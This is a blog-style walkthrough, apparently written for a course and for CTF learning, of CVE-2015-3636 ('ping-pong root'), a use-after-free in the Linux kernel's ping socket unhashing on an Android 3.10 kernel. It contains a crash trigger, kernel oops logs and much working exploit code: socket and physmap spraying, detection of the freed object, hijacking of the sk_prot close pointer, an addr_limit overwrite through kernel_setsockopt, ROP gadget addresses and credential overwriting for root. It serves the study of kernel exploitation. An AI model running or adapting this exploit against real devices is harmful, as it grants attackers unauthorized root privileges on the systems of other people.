Cve 2015 3636 Ping Pong
注
复现的古早 CVE,印象中也是为了研究生课程高级操作系统的展示用的。虽然 ret2dir 这一块仍是一知半解(未来一定找一篇 blog 把坑给填上),但这次复现中学习到的暴力技巧 + 通过 pattern 寻觅成功释放了的对象这些思路,在之后的一些 CTF 上也确实隐隐约约发挥了作用。比如有些 pipe_buffer
的题就会下意识的通过写入不同长度来作为特征。
原文
Let’s play ping-pong in the Linux kernel
Before Anything
CVE-2015-3636, or ping-pong root, is an infamous Use After Free vulnerability disclosed by the Keen team. For its influence and the potential damage could have borrowed to all the Linux-core based devices, for example, android mobiles, it was honored with the Best Privilege Escalation Bug in the Pwnie 2015 1.
Cool enough, but 2015 seems too far away from nowadays, in order to analyze this amazing vulnerability, I choose the android goldfish Linux 3.10.0 kernel as the research target. You can surfing through this link 2 to read the source code.
In the following content, I will introduce the detail of this bug, as well as trigger it to cause the crash of the Linux kernel, last but not least, I will try to together with you guys and write an exploit from scratch (also tells stories about failures for sure).
Pre-knowledge
Before introducing the bug, I think it will be satisfactory of telling some interesting pre-knowledge of the Linux network internal.
When you want to create a network socket, the system call is described below:
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
int socket(int domain, int type, int protocol);
The domain
arguments specify a communication domain, for the IPv4 Internet protocol family we are interested in, the AF_INET
macro will take the credit. The type
argument is always candidate from [SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, ...]
, representing the byte-stream connection, datagram connection, raw network access, so on and so forth. To be specific, the choice of domain
will affect the valid choices of the type
and protocol
. For instance, when adopting the AF_INET
domain as the first argument, the protocol
argument can only be picked from IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP
as well as IPPROTO_IP
.
int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_TCP);
In addition, how the system call handle this? The SYS_socket()
entry point will call sock_create()
function, which followed with __sock_create()
function. In the __sock_create()
, the kernel will choose the protocol handler based on the arguement and call corresponded create function, like below.
pf = rcu_dereference(net_families[family]);
/* ... */
err = pf->create(net, sock, protocol, kern);
For AF_INET
protocol family, the inet_create()
function then take over and go further by picking the specific protocol, tcp_prot
in this case.
There are lines of code that is pretty juicy inside the inet_create
.
/* Add to protocol hash chains. */
sk->sk_prot->hash(sk);
What is protocol hash chains? To my best knowledge, the functional struct sock
will be inserted into the hash table to speed up the find of the right socket when receiving related packets. Anyway, hash stands for quickness and optimization, the socket is somewhat hashed will also lead to unhash operation when the socket is destroyed (Eash prot
struct has its own unhash
function pointer).
However, optimization sometimes brings danger. :(
The Bug itself
The real amazing bug in the wild internal just make me feel like an idiot. –my captain of the CTF team
The errorneous code was found in function ping_unhash()
of file net/ipv4/ping.c
.
void ping_unhash(struct sock *sk)
{
struct inet_sock *isk = inet_sk(sk);
pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
if (sk_hashed(sk)) {
write_lock_bh(&ping_table.lock);
hlist_nulls_del(&sk->sk_nulls_node);
sock_put(sk);
isk->inet_num = 0;
isk->inet_sport = 0;
sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
write_unlock_bh(&ping_table.lock);
}
}
Of course, we can tell the exact code from this highly function-oriented programming stuffs, let me show you more details.
// include/net/sock.h
static inline bool sk_unhashed(const struct sock *sk)
{
return hlist_unhashed(&sk->sk_node);
}
static inline bool sk_hashed(const struct sock *sk)
{
return !sk_unhashed(sk);
}
/* ...some far place in include/linux/list.h... */
static inline int hlist_unhashed(const struct hlist_node *h)
{
return !h->pprev;
}
And this one.
// include/linux/list_nulls.h
static inline void hlist_nulls_del(struct hlist_nulls_node *n)
{
__hlist_nulls_del(n);
n->pprev = LIST_POISON2;
}
The last and spicy one.
// include/net/sock.h
struct sock {
struct sock_common __sk_common;
#define sk_node __sk_common.skc_node
#define sk_nulls_node __sk_common.skc_nulls_node
/* ...... */
};
// include/net/sock.h
struct sock_common {
/* ... */
union {
struct hlist_node skc_node;
struct hlist_nulls_node skc_nulls_node;
};
/* ... */
};
Okay then, read the above code snippets, can you find the interesting bug here?
–A split line–
Whether or not, I will talk about it. When the ping_unhash()
function is called, it will check that if this sock
has been hashed before, using sk_hashed()
macro. The internal code shows us it just check if the pprev
of this node equals to NULL
(that is a null hash list for sure). After that, it will then enter into the following code block and do the unhash job, like delete the node from the hash list by calling hlist_nulls_del()
.
Sounds pretty legitimate, however, after the hlist_nulls_del()
remove the node, it assigns LIST_POISON2
to the pprev
of that node instead of NULL
, which means another time when ping_unhash()
is called, the unhash job will be handled again.
And that is not what we expect, not at all.
Triggering
Now we are aimed to trigger this unexpected double unhashing. To save your time, I will directly (shamelessly) use the open-source trigger script and analyze it afterward.
// trigger.c
int main(int argc, char* argv[])
{
int sock, ret;
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
sa.sin_family = AF_UNSPEC;
ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
return 0;
}
After you compile this code and run it on the vulnerable machine, supported by QEMU. It will stably crash your kernel as below.
$ (before you need to adb push the binary and adb shell to that emulator)
$ ./trigger
Unable to handle kernel paging request at virtual address 00200200
pgd = ffffffc03db3b000
[00200200] *pgd=000000007db3e003, *pmd=0000000000000000
Internal error: Oops: 94000046 [#1] SMP
Modules linked in:
CPU: 0 PID: 898 Comm: poc Not tainted 3.10.0+ #1
task: ffffffc03eddd100 ti: ffffffc03db44000 task.ti: ffffffc03db44000
PC is at ping_unhash+0x30/0xa4
LR is at ping_unhash+0x28/0xa4
pc : [<ffffffc0003c4d8c>] lr : [<ffffffc0003c4d84>] pstate: 80000145
sp : ffffffc03db47da0
x29: ffffffc03db47da0 x28: ffffffc03db44000
x27: ffffffc0005dc000 x26: 00000000000000cb
x25: 0000000000000116 x24: 0000000000000015
x23: 0000000000000000 x22: 0000007fef136f6c
x21: 0000000000000010 x20: ffffffc00045a000
x19: ffffffc03db32300 x18: 0000007faa0ce000
x17: 0000007fef1366b0 x16: ffffffc000346e8c
x15: 000000000047c927 x14: 000000000047c903
x13: 0000000000000000 x12: 000000000047c8df
x11: 00000000ffffffff x10: 00000000ffffffff
x9 : 0000000000000000 x8 : 00000000000000cb
x7 : 7f7f7f7f7f7f7f7f x6 : 0000000000000000
x5 : 0000000000000001 x4 : ffffffc0003bb928
x3 : 0000000000000002 x2 : 0000000000000000
x1 : 0000000000200200 x0 : 0000000000000003
......
Call trace:
[<ffffffc0003c4d8c>] ping_unhash+0x30/0xa4
[<ffffffc0003af350>] udp_disconnect+0x84/0xe4
[<ffffffc0003bb9d8>] inet_dgram_connect+0xb0/0xdc
[<ffffffc000346f04>] SyS_connect+0x78/0xcc
Code: 91080000 940247d4 f9401e61 f9401a60 (f9000020)
---[ end trace 937e3c3edcc9779b ]---
Kernel panic - not syncing: Fatal exception in interrupt
In addition, if you get an error like
Permission denied
when creating the socket, you have to fix the capacity issue. I just use the commandsysctl -w net.ipv4.ping_group_range="0 2147483647"
to enable the ICMP socket construction through system call.
Well done, let’s analyze how the trigger works.
It first creates an AF_INET
socket with SOCK_DGRAM
and IPPROTO_ICMP
arguments. That is sensible as we are going to hack the ping
protocol, which is part of the ICMP protocols. About why SOCK_DGRAM
is picked, let’s go further.
The code then calls connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
, using AF_INET
as sa.sin_family
. We just dig deeper to see what will happen.
Then entrance of connect
system call is SyS_connect
, defined in net/socket.c
as below.
SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
int, addrlen)
{
struct socket *sock;
struct sockaddr_storage address;
int err, fput_needed;
sock = sockfd_lookup_light(fd, &err, &fput_needed);
if (!sock)
goto out;
err = move_addr_to_kernel(uservaddr, addrlen, &address);
if (err < 0)
goto out_put;
err =
security_socket_connect(sock, (struct sockaddr *)&address, addrlen);
if (err)
goto out_put;
err = sock->ops->connect(sock, (struct sockaddr *)&address, addrlen,
sock->file->f_flags);
out_put:
fput_light(sock->file, fput_needed);
out:
return err;
}
It will fetch the actual sock struct
using the user applied fd
, then it will map the address, do security checking, and comes to the custom connect of socket specific operations. In this case, it will jump to inet_dgram_connect()
as the socket is created with SOCK_DGRAM
flag and leads to an inet_dgram_ops
operation struct.
int inet_dgram_connect(struct socket *sock, struct sockaddr *uaddr,
int addr_len, int flags)
{
struct sock *sk = sock->sk;
if (addr_len < sizeof(uaddr->sa_family))
return -EINVAL;
if (uaddr->sa_family == AF_UNSPEC)
return sk->sk_prot->disconnect(sk, flags);
if (!inet_sk(sk)->inet_num && inet_autobind(sk))
return -EAGAIN;
return sk->sk_prot->connect(sk, uaddr, addr_len);
As this connect
is called with AF_INET
family argument, it will pass the first two checking and enter into inet_autobind()
functions. What’s more, that function will further call socket specific get_port
methods.
static int inet_autobind(struct sock *sk)
{
/* ... */
if (sk->sk_prot->get_port(sk, 0)) {
release_sock(sk);
return -EAGAIN;
}
/* ... */
In this case, that will result in the calling of ping_get_port
function. In this one, the kernel will hash the socket into hash ping_hashslot
for accelerating. (What is weird is that the ping_hash
is just an empty function…)
int ping_get_port(struct sock *sk, unsigned short ident)
{
/* ... */
if (sk_unhashed(sk)) {
pr_debug("was not hashed\n");
sock_hold(sk);
hlist_nulls_add_head(&sk->sk_nulls_node, hlist);
sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
}
/* ... */
}
Any familiarity? This is so symmetrical to the ping_unhash
function. In fact, this is how a ping socket is being hashed. And that is the purpose of the current connect
system call.
So, what about another two connect
, they are designed to call into ping_unhash()
function twice. See the code snippet of inet_dgram_connect()
above. You can find that when AF_UNSPEC
value is applied, the connect
goes died and falls into disconnect
method, which is udp_disconnect()
here. In that function, if this socket has not been bind to a specific socket, it will call unhash
method, which is our target vulnerable ping_unhash
function.
That is, we can go into ping_unhash
twice and trigger the bug. But wait a moment, what about the crash?
BUG: unable to handle kernel paging request at 00200200
Disassemble the vmlinux
and locate the precise position, we can find that the BUG is happening here.
// static inline void __hlist_nulls_del(struct hlist_nulls_node *n)
*pprev = next;
Because n->pprev
is already changed to LIST_POISON2
in the first connect
with AF_UNSPEC
. This time when dereferencing pprev
, it will points to an unmapped address, thus cause the kernel panic.
Exploiting
We now have a point dereference in user-level address space, which is rather limited for constructing a useful primitive.
To avoid the kernel just crash here and go further for another vulnerable point, the hacker can call the mmap
system call to map this address.
Thankfully, after the hlist_nulls_del()
is finished, the sock_put()
function can be used to bring a Use After Free of the sock
object.
/* Ungrab socket and destroy it, if it was the last reference. */
static inline void sock_put(struct sock *sk)
{
if (atomic_dec_and_test(&sk->sk_refcnt)) // <- dec twice and free
sk_free(sk);
}
No RCU, no strict checking, what a strong and stable Use After Free trigger…
With the Use After Free in hand, the next step is to raise a malicious Use After Free.
Allocating and Releasing
To do that, we first find the place where the sock
is allocated. When the socket
system call is used, the following inet_create()
function will call sk_alloc()
function that is defined in net/core/sock.c.
static struct sock *sk_prot_alloc(struct proto *prot, gfp_t priority,
int family)
{
struct sock *sk;
struct kmem_cache *slab;
slab = prot->slab;
if (slab != NULL) {
sk = kmem_cache_alloc(slab, priority & ~__GFP_ZERO);
if (!sk)
return sk;
if (priority & __GFP_ZERO) {
if (prot->clear_sk)
prot->clear_sk(sk, prot->obj_size);
else
sk_prot_clear_nulls(sk, prot->obj_size);
}
} else
sk = kmalloc(prot->obj_size, priority);
/* ... */
In this function, the sock
will be allocated by kmem_cache_alloc
if the slab
member is not empty, otherwise kmalloc
is adopted.
For this case, the core inet_init()
function calls proto_register()
with ping_prot
argument and true
flag of alloc_slab
. Thus, a kmem_cache
object is going to be created using PING
as its name.
prot->slab = kmem_cache_create(prot->name, prot->obj_size, 0,
SLAB_HWCACHE_ALIGN | prot->slab_flags,
NULL);
// Through debugging, the prot->name = "PING", prot->objsize = 0x270,
// align = 0, flags = 0x2000 (should be just SLAB_HWCACHE_ALIGN)
// In addition, per PING slub will have 2 pages and max 16 objects
Symmetrically, the corresponded release of the object is done in sk_prot_free()
function.
static void sk_prot_free(struct proto *prot, struct sock *sk)
{
struct kmem_cache *slab;
struct module *owner;
owner = prot->owner;
slab = prot->slab;
security_sk_free(sk);
if (slab != NULL)
kmem_cache_free(slab, sk);
else
kfree(sk);
module_put(owner);
}
UAF primitive
For now, we understand the details about the allocation and release of the object. After successfully triggering two times of ping_unhash()
and the sock_put()
of an in-use file socket descriptor, obtaining a malicious primitive is our next target. Observing the content of struct sock
, a lot of pointers can be hunted.
A direct idea for exploiting is to fake and fill the skc_prot
element in __sk_common
with a user control object, and points the close
method of this structure to the backdoor function afterward. Thus, when the user calls the close
of this socket, the malicious code will be executed.
In order to do that, a clever spraying solution shall be taken. In the traditional method, fetching the already freed object can be achieved with add_key
, send_msg
, and setxattr
. However, the ping sock object is allocated from the PING
kmem_cache, which brings high limitation.
For example, you can create another PING
socket to fetch the freed ping sock object but cannot fill what you want because the initialization of that sock is done by the initializing handler.
To overcome the constraint, the author tries another crazy idea —— phsymap spraying. That is a basic block of the new attack method named ret2dir, purposed in Usenix 2014. Although it sounds like a complicated and intricate hacking skill, its internal is just super naive. The attacker can create thousands of the ping sock objects, filling the PING
kmem_cache with exceed slab pages. Then selectively release part of them to lead a page discarding. Once a slab page with vulnerable sock
is discarded, it is possible to be fetched in userspace page fault handling. I won’t explain the details of that, you may refer to this blog of mine if interested.
P.S. To be honest, even though my tiny experiment about
mmap
and slub allocator was done in x86 environment, I failed in this case (the reason will be provided later). So to ease the burden of mine, I will pick an environment from an existing CTF problem (ensuring that I have a valid answer already ;D). The target kernel labels with version 3.10+, which shouldn’t do much difference for our exploiting. If you have an interest, try to implement this in other architecture. Last but not least, you can refer to this Github repo 3 if you want to have a quick test.
Fetch the ‘double-freed’ socket
The first step of our plan is to adopting socket spraying as well as physmap spraying to implement a UAF primitive. Let’s just convert the idea into an exploit code.
“Talk is cheap, show me the code.”, let’s just write some code snippets.
int main(int argc, char* argv[])
{
prepare(...);
// We can do some preparation here, maximize the resources for example
protection(...);
// Then we should do `mmap` of the poision value to avoid early crash
spraying(...);
// We should create vulnerable sockets as well as spraying lots of ping sock objects here
fetching(...);
// Then we can do lots of mmap here, trying to fetch the target page
close(...the fetch socket...);
}
Above is just a bare metal idea, let’s achieve them step by step. Before launch the attack, some preparation has to be done.
void prepare(void)
{
printf("[+] Start prepare...\n");
/* maximize the fd limit to enable spraying */
struct rlimit rlim;
int ret;
ret = getrlimit(RLIMIT_NOFILE, &rlim);
if (ret != 0) errhandler("[!] prepare().getrlimit-1")
rlim.rlim_cur = rlim.rlim_max;
setrlimit(RLIMIT_NOFILE, &rlim);
ret = getrlimit(RLIMIT_NOFILE, &rlim);
if (ret != 0) errhandler("[!] prepare().getrlimit-2")
printf("[~] Done prepare!\n");
}
Here we just use setrlimit
system call to maximize the socket counts that we can ask for. This can be quite essential for later heap spraying, as we have to create enough sockets to make sure the dynamic memory space can be overlapped with the physmap region.
Then we do simple protection in case our exploit crash the kernel in an early stage.
void protection(void)
{
printf("[+] Start protection...\n");
int i;
void* protect = mmap(PROTECT_BASE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
if(MAP_FAILED == protect) errhandler("[!] protection().mmap");
for(i = 0; i < MAX_NULLMAP_SIZE / PAGE_SIZE; i++)
memset((char *)protect + PAGE_SIZE * i, 0x90, PAGE_SIZE);
printf("[~] Done protection!\n");
}
The PROTECT_BASE
in our experiments should be 0x200000
as the invalid memory dereference is 0x200200
. After we mmap that address space, the page fault will not be triggered (Assuming no SMAP protection).
So far so good, let’s spraying those vulernable sockets now.
void spraying(void)
{
printf("[+] Start socket spraying...\n");
int i, ret;
struct sockaddr _sockaddr1 = { .sa_family = AF_INET };
struct sockaddr _sockaddr2 = { .sa_family = AF_UNSPEC };
for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
{
vultrig_socks[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
if(vultrig_socks[i] < 0) errhandler("[!] spraying().socket-create vultrig sockets");
ret = connect(vultrig_socks[i], &_sockaddr1, sizeof(_sockaddr1));
if(ret < 0) errhandler("[!] spraying().connect-hashing the socket");
}
for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
{
ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
if(ret < 0) errhandler("[!] spraying().connect-free once");
ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
if(ret < 0) errhandler("[!] spraying().connect-free twice");
}
printf("[~] Done socket spraying!\n");
printf("[+] Start physmap spraying...\n");
memset(physmap_spray_pages, 0, sizeof(physmap_spray_pages));
memset(physmap_spray_children, 0, sizeof(physmap_spray_children));
physmap_spray_pages_count = 0;
for(i = 0; i < MAX_PHYSMAP_SPRAY_PROCESS; i++)
{
int j;
void* mapped;
void* mapped_page;
mapped = mmap(NULL, MAX_PHYSMAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
if (mapped == MAP_FAILED) errhandler("[!] spraying().mmap");
for(j = 0; j < MAX_PHYSMAP_SIZE / PAGE_SIZE; j++)
{
memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE);
mapped_page = (void *)((char *)mapped + PAGE_SIZE * j);
*(unsigned long *)((char *)mapped_page + 0x1D8) = MAGIC_VALUE + physmap_spray_pages_count;
// special magic for quick identify
physmap_spray_pages[physmap_spray_pages_count] = mapped_page;
physmap_spray_pages_count++;
}
}
printf("[~] Done physmap spraying!\n");
}
Those parameters for spraying can be trivial, so I just copy from the workable exploit, and fortunately, it works. In this function, we create MAX_VULTRIG_SOCKS_COUNT
sockets, do what we did in the POC code (hashing the socket, then try to release them). After that, we have plenty of released struct sock
in hand.
So we start physmap spraying, hope through large mmap
space we can fetch one of those released sock
. To test that, we can adopt the ioctl
+ SIOCGSTAMPNS
skill, which will retrieve a specific field in the wanted socket
struct. That is to say, if we fill that field with some identifiable magic value, we can use this ioctl
to verify whether or not the parameter is a vulnerable socket. The code is shown below.
void fetching(void)
{
printf("[+] Start fetching the UAF socket...\n");
struct timespec time;
uint64_t value;
void* page = NULL;
int j = 0;
int got = 0;
int index = MAX_VULTRIG_SOCKS_COUNT / 2;
do
{
exp_sock = vultrig_socks[index];
memset(&time, 0, sizeof(time));
ioctl(exp_sock, SIOCGSTAMPNS, &time);
value = ((uint64_t)time.tv_sec * NSEC_PER_SEC) + time.tv_nsec;
for(j = 0; j < physmap_spray_pages_count; j++)
{
page = physmap_spray_pages[j];
if(value == *(unsigned long *)((char *)page + 0x1D8)) // value equals to what we filled
{
printf("[*] obtained magic:%p\n", value);
got = 1;
payload = page; // The vulnerable socket is located in this page
break;
}
}
index += 1;
}
while(!got && index < MAX_VULTRIG_SOCKS_COUNT);
if(got == 0) errhandler("[!] fetching() fail...");
printf("[~] Done fetching the UAF socket!\n");
}
Till now, we can check if or not the UAF is succeed? (The entire code can be downloaded here: https://gist.github.com/f0rm2l1n/31ab1d42e0e18f94a5ce928816a5f65c)
# user screen
$ # also need adb push the code
$ ./exp1
[+] Start prepare...
[~] Done prepare!
[+] Start protection...
[~] Done protection!
[+] Start socket spraying...
[~] Done socket spraying!
[+] Start physmap spraying...
[~] Done physmap spraying!
[+] Start fetching the UAF socket...
[*] obtained magic:0x4b625e33
[~] Done fetching the UAF socket!
# kernel dmesg
.......
IPv4: Attempt to release alive inet socket ffffffc032400000
IPv4: Attempt to release alive inet socket ffffffc032400300
IPv4: Attempt to release alive inet socket ffffffc032400600
IPv4: Attempt to release alive inet socket ffffffc032400900
IPv4: Attempt to release alive inet socket ffffffc032400c00
IPv4: Attempt to release alive inet socket ffffffc032400f00
IPv4: Attempt to release alive inet socket ffffffc032401200
IPv4: Attempt to release alive inet socket ffffffc032401500
IPv4: Attempt to release alive inet socket ffffffc032401800
IPv4: Attempt to release alive inet socket ffffffc032401b00
IPv4: Attempt to release alive inet socket ffffffc032402000
IPv4: Attempt to release alive inet socket ffffffc032402300
IPv4: Attempt to release alive inet socket ffffffc032402600
IPv4: Attempt to release alive inet socket ffffffc032402900
IPv4: Attempt to release alive inet socket ffffffc032402c00
IPv4: Attempt to release alive inet socket ffffffc032402f00
IPv4: Attempt to release alive inet socket ffffffc032403200
IPv4: Attempt to release alive inet socket ffffffc032403500
IPv4: Attempt to release alive inet socket ffffffc032403800
IPv4: Attempt to release alive inet socket ffffffc032403b00
IPv4: Attempt to release alive inet socket ffffffc032404000
Unable to handle kernel paging request at virtual address 4141414141414141
pgd = ffffffc03dbcb000
[4141414141414141] *pgd=0000000000000000
Internal error: Oops: 94000005 [#1] SMP
Modules linked in:
CPU: 0 PID: 945 Comm: exp1 Not tainted 3.10.0+ #1
task: ffffffc03ed32d00 ti: ffffffc03dbd4000 task.ti: ffffffc03dbd4000
PC is at ip_mc_drop_socket+0x34/0xa8
LR is at ip_mc_drop_socket+0x24/0xa8
pc : [<ffffffc0003bdc0c>] lr : [<ffffffc0003bdbfc>] pstate: 60000145
sp : ffffffc03dbd7d90
x29: ffffffc03dbd7d90 x28: ffffffc03dbd4000
x27: ffffffc0005dc000 x26: 0000000000000039
x25: ffffffc03daf7710 x24: ffffffc030c31430
x23: ffffffc00045a000 x22: ffffffc031620000
x21: ffffffc03ebf8180 x20: ffffffc0316200e8
x19: 4141414141414141 x18: 0000007f94698000
x17: 0000000000000000 x16: ffffffc000141878
x15: 00000000004a7d04 x14: 0000000000000010
x13: 0a2174656b636f73 x12: 2046415520656874
x11: 0000000000000000 x10: 0000007f93817108
x9 : 6d313e33a48870ce x8 : 0000000000000039
x7 : ffffffc000617038 x6 : 0000000000000000
x5 : 0000000000000000 x4 : 0000000000000000
x3 : 0000000041414141 x2 : 0000000000000000
x1 : 0000000000000000 x0 : ffffffc03ed32d00
...
Call trace:
[<ffffffc0003bdc0c>] ip_mc_drop_socket+0x34/0xa8
[<ffffffc0003b9fd0>] inet_release+0x48/0x94
[<ffffffc000344d58>] sock_release+0x20/0x9c
[<ffffffc000344de0>] sock_close+0xc/0x1c
[<ffffffc0001439bc>] __fput+0x98/0x23c
[<ffffffc000143c20>] ____fput+0x8/0x14
[<ffffffc0000b5048>] task_work_run+0x94/0xec
[<ffffffc000088070>] do_notify_resume+0x50/0x64
Code: 9103a2d4 b00004f7 f94146d3 b4000313 (f9400260)
The fact is that the UAF is not one hurdred percent stable. So run again if not satisfy the expectation.
Cool! The kernel is crashed because of page fault at 0x4141414141414141, which is quite obvious what we filled in our mmap
spraying.
memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE);
We can look into the source code to understand this panic, is about function void ip_mc_drop_socket(struct sock *sk)
, which is called by inet_realease()
.
{
struct inet_sock *inet = inet_sk(sk);
struct ip_mc_socklist *iml;
struct net *net = sock_net(sk);
if (inet->mc_list == NULL)
return;
/* .... */
}
This function first obtain variable inet
from sock
, which is filled with 0x41
bytes. Then it tries to retrive the mc_list
field in inet
, results in the invalid dereference at 0x4141414141414141
. To avoid that, we can place NULL variable at this field.
PC hijacking
As we already have controllable UAF primitive, it’s time to seek a useful code or data pointer to achieve further exploiting. As we already discussed, hijacking the skc_proto
field of __sk_common
in the struct sock
is an applicable way, as inet_release()
function will adopt related indirect call.
int inet_release(struct socket *sock)
{
struct sock *sk = sock->sk;
if (sk) {
/* ... */
sk->sk_prot->close(sk, timeout); // very juicy
}
return 0;
}
You can refer to here for the detail of proto
. The related code is like below.
struct proto* fakeproto = malloc(sizeof(struct proto));
fakeproto->close = /* what we want to go */;
*(unsigned long *)((char* )payload + 40) = fakeproto;
Privilege Escalation
So what we should do next seems quite clear, can we write a user-mode backdoor and directly call commit_creds()
as usual? Unfortunately, the answer is no and it really hits me after testing. The kernel shows error message like below
Bad mode in Synchronous Abort handler detected, code 0x8400000f
CPU: 0 PID: 914 Comm: exp2 Not tainted 3.10.0+ #1
task: ffffffc03ecd5100 ti: ffffffc03db60000 task.ti: ffffffc03db60000
PC is at 0x400c30
LR is at inet_release+0x84/0x94
Well? What happens? After googling around, I found that the ARM architecture has its own security property inside its page table, which x86 has none. You can look up the manual or this description for detail. In a nutshell, the ARM architecture has accurate Access Permissions for different memory locations, enabling separation between EL0 (Unprivileged) and other privileged modes. Thus, directly return to the user malicious code can not take effect here.
Fine, time to learn and try something new this time. As we cannot execute the code we write, we can adopt the kernel ROP technique to do tricky hacking.
For a newbie like me, it’s quite hard to do it all by myself (construct an ROP chain, bypassing PXN, leaking task_struct
…). Thus, I just want to understand and modify others’ code for successful exploitation. Because CVE-2015-3636 is a famous and old bug, you can find many resources to do this.
We simply plagiarize others’ code like below.
Hijacking addr_limit
The trick here was purposed in 2016, through function int kernel_setsockopt()
.
int kernel_setsockopt(struct socket *sock, int level, int optname,
char *optval, unsigned int optlen)
{
mm_segment_t oldfs = get_fs();
char __user *uoptval;
int err;
uoptval = (char __user __force *) optval;
set_fs(KERNEL_DS);
if (level == SOL_SOCKET)
err = sock_setsockopt(sock, level, optname, uoptval, optlen);
else
err = sock->ops->setsockopt(sock, level, optname, uoptval,
optlen);
set_fs(oldfs);
return err;
}
In this function, the kernel will first save current mm_segment_t
to oldfs
, update to KERNEL_DS
, which is 0xffffffffffffffff here, enabling current thread the ability to read&write kernel space memory. After the sock_setsockopt
is finished, oldfs
will be restored. As we can hijack the pc to construct ROP chain, we can
- redirect
sk->sk_prot->close(sk, timeout);
tokernel_setsockopt
. - construct fake
ops
insock
to letsock->ops->setsockopt
call to other place to escape theset_fs(oldfs);
.
When it comes to detail, I pick some assemble code below as well as some value learnt from debugging.
kernel_setsockopt
.text:FFFFFFC0003443CC STP X29, X30, [SP,#-0x20+var_s0]!
.text:FFFFFFC0003443D0 CMP W1, #1
.text:FFFFFFC0003443D4 MOV X5, SP
.text:FFFFFFC0003443D8 MOV X29, SP
.text:FFFFFFC0003443DC STP X19, X20, [SP,#var_s10]
.text:FFFFFFC0003443E0 AND X19, X5, #0xFFFFFFFFFFFFC000
.text:FFFFFFC0003443E4 MOV X5, #0xFFFFFFFFFFFFFFFF
.text:FFFFFFC0003443E8 LDR X20, [X19,#8]
.text:FFFFFFC0003443EC STR X5, [X19,#8]
.text:FFFFFFC0003443F0 B.EQ loc_FFFFFFC000344410
.text:FFFFFFC0003443F4 LDR X5, [sock,#0x28]
.text:FFFFFFC0003443F8 LDR X5, [X5,#0x68]
.text:FFFFFFC0003443FC BLR X5 # break points here
.text:FFFFFFC000344400 STR oldfs, [X19,#8]
.text:FFFFFFC000344404 LDP X19, oldfs, [SP,#var_s10]
.text:FFFFFFC000344408 LDP X29, X30, [SP+var_s0],#0x20
.text:FFFFFFC00034440C RET
When the rop chain is executed at 0xFFFFFFC0003443FC
, the X20
register keeps the oldfs
variable, whose value is 0x8000000000
. At this place, [SP]
and [SP+0x8]
stores old value of X19
and X20
. We don’t have to know these details, compiler just save them for principle.
The called routine is expected to preserve r19-r28. link
By doing this, the control-flow bypass code at 0xFFFFFFC000344400
and do no side effect. (remember that in RISC architecture, the return address won’t automatically save into stack!)
In all, after the addr_limit
is malicious enlarged, we obtain an arbitary read & write primitive through pipe read & write. (now we just remember this, a post discussing about pipe will be released in near future ;D)
Enable mmap
NULL address
To enable mmap at NULL address will do help to subsequent missions (leaking task_struct). To do so, we can just utilize the aribitary write primitive to write the variable mmap_min_addr
in kernel data section.
Leaking task_struct
Cool, as we can write to any place we want and we can (to some extent) hijack the control-flow when close a vulnerable socket. The direct idea to get a privilege escalation is to write real_cred
struct for current task_struct
. Once we leak the address of this target, we can easily modify the value of it.
How to do that?
An interesting finding when we achieve the arbitrary read&write primitive can be discussed now. Let’s look into set_fs
and get_fs
.
#define get_fs() (current_thread_info()->addr_limit)
static inline void set_fs(mm_segment_t fs)
{
current_thread_info()->addr_limit = fs;
}
We see that both get_fs
and set_fs
contact with current_thread_info
. How do them achieve this in code?
static inline struct thread_info *current_thread_info(void)
{
register unsigned long sp asm ("sp");
return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}
Isn’t that amazing? To obtain the current thread_info
, what you should do is to xor current stack pointer with 0xFFFFFFFFFFFFC000
. How beautiful the alignment is! Why can this weird function extract the thread_info
should be answered by the kernel stack design. In Aarch64, the kernel stack for each thread is 16kb, and corresponded thread_info
is just located at the start position. Hence, you know why this trick takes effects.
What we do next is to find a proper gadget to get the address of thread_info
, and further get the address of task_struct
. Exising solutions utilize gadget in mutex_trylock()
.
.text:FFFFFFC00045457C MOV X2, SP
.text:FFFFFFC000454580 AND X2, X2, #0xFFFFFFFFFFFFC000
.text:FFFFFFC000454584 LDR X2, [X2,#0x10]
.text:FFFFFFC000454588 STR X2, [X1,#0x18]
.text:FFFFFFC00045458C RET
With the help of this gadget, the value of thread_info+0x10
, which is the struct task_struct *task
will be stored into address X1 + 0x18
. Back to the PC hijack position in inet_release()
. X1
represents the variable timeout
, whose value is 0 in our experiement. That is to say, the address of current task_struct
is stored at virtual address 0x0 + 0x18
. (Now you understand why we need to enable mmap NULL address).
The remain part is quite clear: with real_cred
offset in hand, we can rewrite uid
, gid
, suid
… to zero… In addition, some solutions will clean out task_struct->files->fdt
to avoid early crash (because there are large number of UAF socket still there).
The entire code for you can be found here.
The image of exploit can be viewed below.
The old CVE-2015-3636 is quite an attractive one. Playing with this can help you learn knowledge of the basics of advanced kernel exploitation. It can also open the door os Android hacking for you. Through this blog, hope you understand the internal of this bug and the solution to hijacking.
